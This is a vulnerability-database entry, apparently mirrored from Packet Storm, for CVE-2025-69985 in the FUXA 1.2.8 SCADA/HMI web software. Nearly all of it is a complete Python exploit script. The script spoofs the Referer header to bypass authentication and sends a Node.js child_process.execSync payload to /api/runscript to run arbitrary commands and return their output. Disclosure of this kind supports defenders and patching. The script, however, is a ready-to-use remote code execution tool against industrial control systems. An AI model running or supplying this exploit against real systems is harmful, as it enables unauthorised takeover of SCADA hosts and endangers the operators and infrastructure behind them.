Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 FUX 1.2.8 Authentication Bypass / Remote Command Execution

🗓️ 25 Feb 2026 00:00:00Reported by Joshua van der pollType 
packetstorm
 packetstorm🔗 packetstorm.news👁 118 Views

FUXA 1.2.8 auth bypass allows remote command execution via /api/runscript (CVE-2025-69985).

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for Authentication Bypass Using an Alternate Path or Channel in Frangoteam Fuxa
2 May 202612:40
githubexploit
GithubExploit		Exploit for Authentication Bypass Using an Alternate Path or Channel in Frangoteam Fuxa
4 May 202601:17
githubexploit
GithubExploit		Exploit for CVE-2025-69985
25 Feb 202610:12
githubexploit
Circl		CVE-2025-69985
25 Feb 202620:06
circl
CNNVD		FUXA 安全漏洞
24 Feb 202600:00
cnnvd
CVE		CVE-2025-69985
24 Feb 202600:00
cve
Cvelist		CVE-2025-69985
24 Feb 202600:00
cvelist
Exploit DB		FUXA 1.2.8 - Authentication Bypass + RCE Exploit
30 Apr 202600:00
exploitdb
Github Security Blog		FUXA has JWT Authentication Bypass via HTTP Referer header spoofing
24 Feb 202618:31
github
NVD		CVE-2025-69985
24 Feb 202616:24
nvd
Rows per page
#!/usr/bin/env python3
    """
    FUXA ≤ 1.2.8 Authentication Bypass + RCE Exploit
    CVE-2025-69985
    
    This Python exploit targets CVE-2025-69985, an authentication bypass in FUXA
    (web-based SCADA/HMI software) that allows access to the protected /api/runscript
    endpoint even when authentication is enabled.
    
    By sending a crafted JavaScript payload using child_process.execSync, it achieves
    full remote command execution with complete stdout capture (no reverse shell needed).
    
    Author: Joshua van der poll (https://github.com/joshuavanderpoll/CVE-2025-69985)
    Created: February 2026
    Version: 1.0
    License: GNU General Public License v3.0 (GPL-3.0)
    Disclaimer: Use responsibly. This is a proof-of-concept for a patched
                     vulnerability (fixed in FUXA > 1.2.8). Do not use against
                     systems you do not own or have explicit permission to test.
    
    Usage:
        python3 exploit.py -u http://target:1881 -c "whoami"
    """
    
    import requests
    import argparse
    import sys
    import urllib3
    
    # Disable SSL warnings
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    # Colors
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    RED = '\033[91m'
    BLUE = '\033[94m'
    CYAN = '\033[96m'
    RESET = '\033[0m'
    
    def print_status(msg, color=BLUE, symbol="[*]"):
        print(f"{color}{symbol} {msg}{RESET}")
    
    def print_success(msg):
        print_status(msg, GREEN, "[+]")
    
    def print_warning(msg):
        print_status(msg, YELLOW, "[!]")
    
    def print_error(msg, exc=None):
        print_status(msg, RED, "[-]")
        if exc:
            print(f" → {type(exc).__name__}: {exc}")
            import traceback
            traceback.print_exc(limit=2)
    
    def build_js_payload(command: str) -> str:
        """Build safe Node.js payload with proper escaping"""
        escaped = (command
                   .replace('\\', '\\\\')
                   .replace('"', '\\"')
                   .replace('`', '\\`')
                   .replace('\n', '\\n'))
        
        js = f"""const cp = require("child_process");
    try {{
        const result = cp.execSync("{escaped}", {{ encoding: "utf8" }});
        return result.toString();
    }} catch (err) {{
        return "ERROR: " + err.message +
               (err.stdout ? "\\nSTDOUT: " + err.stdout.toString() : "") +
               (err.stderr ? "\\nSTDERR: " + err.stderr.toString() : "");
    }}"""
        return js
    
    def run_command(session, base_url, command):
        print_status(f"Preparing payload → executing: {command}")
       
        js_code = build_js_payload(command)
        payload = {
            "params": {
                "script": {
                    "parameters": [],
                    "mode": "",
                    "id": "exploit",
                    "name": "exploit",
                    "code": js_code,
                    "test": js_code
                },
                "toLogEvent": False
            }
        }
    
        headers = {
            "Content-Type": "application/json",
            "Referer": f"{base_url}/fuxa"
        }
    
        print_status("Sending exploit request to /api/runscript ...")
        try:
            resp = session.post(
                f"{base_url}/api/runscript",
                json=payload,
                headers=headers,
                timeout=15,
                verify=False
            )
    
            print_status(f"Response status: {resp.status_code}", CYAN)
    
            if resp.status_code == 200:
                output = resp.text.strip()
                print_success("Command executed successfully (CVE-2025-69985 bypass)!")
                print(f"\n{GREEN}=== COMMAND OUTPUT ==={RESET}")
                print(output if output else "(no output)")
                print(f"{GREEN}======================{RESET}\n")
                return True
            else:
                print_error(f"Server returned {resp.status_code}")
                if resp.text.strip():
                    print(f"Body preview: {resp.text[:500]}")
                return False
    
        except requests.exceptions.Timeout:
            print_warning("Request timed out (command may still have executed)")
            return False
        except Exception as e:
            print_error("Request failed", e)
            return False
    
    def exploit_command(base_url, command):
        session = requests.Session()
        session.verify = False
    
        # Execute command
        success = run_command(session, base_url, command)
    
        if success:
            print("\n" + "="*70)
            print(f" {GREEN}Exploit completed!.{RESET}")
            print("="*70 + "\n")
        else:
            print_warning("Exploit may require checking target version / network")
    
    def main():
        parser = argparse.ArgumentParser(
            description="FUXA ≤ 1.2.8 Auth Bypass + RCE (CVE-2025-69985)"
        )
        parser.add_argument('-u', '--url', required=True, help="Target URL (http(s)://host:port)")
        parser.add_argument('-c', '--cmd', required=True, help="Command to execute on target")
        args = parser.parse_args()
    
        base_url = args.url.rstrip('/')
    
        print(f"\n {BLUE}Target :{RESET} {base_url}")
        print(f" {BLUE}Command:{RESET} {args.cmd}\n")
    
        try:
            exploit_command(
                base_url=base_url,
                command=args.cmd
            )
        except KeyboardInterrupt:
            print_warning("Interrupted by user")
            sys.exit(2)
        except Exception as e:
            print_error("Unexpected fatal error", e)
            sys.exit(3)
    
    if __name__ == "__main__":
        main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Feb 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.8
EPSS0.05633
authentication bypassremote command executionapi runscriptcve-2025-69985
118